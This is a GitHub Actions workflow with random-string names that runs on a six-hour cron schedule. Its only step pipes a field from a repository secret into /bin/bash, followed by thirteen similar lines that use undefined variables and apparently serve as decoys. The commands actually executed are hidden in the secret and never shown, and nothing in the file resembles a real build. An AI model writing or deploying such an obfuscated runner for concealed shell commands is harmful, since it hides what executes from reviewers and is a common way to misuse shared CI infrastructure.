name: huhuangzhang6574
on:
  workflow_dispatch:
  schedule:
    - cron: '15 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huhuangzhang6574
        env:
          aeqx2958: ${{ secrets.aeqx2958 }}
        run: |
          echo $aeqx2958 | jq -r .mwh951 | /bin/bash
          echo $vewl9926 | jq -r .czl5155 | /bin/bash
          echo $tey4 | jq -r .f20083 | /bin/bash
          echo $gu4 | jq -r .suvfc35942 | /bin/bash
          echo $l47 | jq -r .ul9341 | /bin/bash
          echo $nalvq3523 | jq -r .ca0029 | /bin/bash
          echo $zehv736 | jq -r .qpln42 | /bin/bash
          echo $nps8821 | jq -r .cu11 | /bin/bash
          echo $m86 | jq -r .h92198 | /bin/bash
          echo $m526 | jq -r .fy03270 | /bin/bash
          echo $h0299 | jq -r .uzdkk11078 | /bin/bash
          echo $y3 | jq -r .cdbw46 | /bin/bash
          echo $fu24587 | jq -r .lymk0 | /bin/bash
          echo $jqom2103 | jq -r .br36809 | /bin/bash

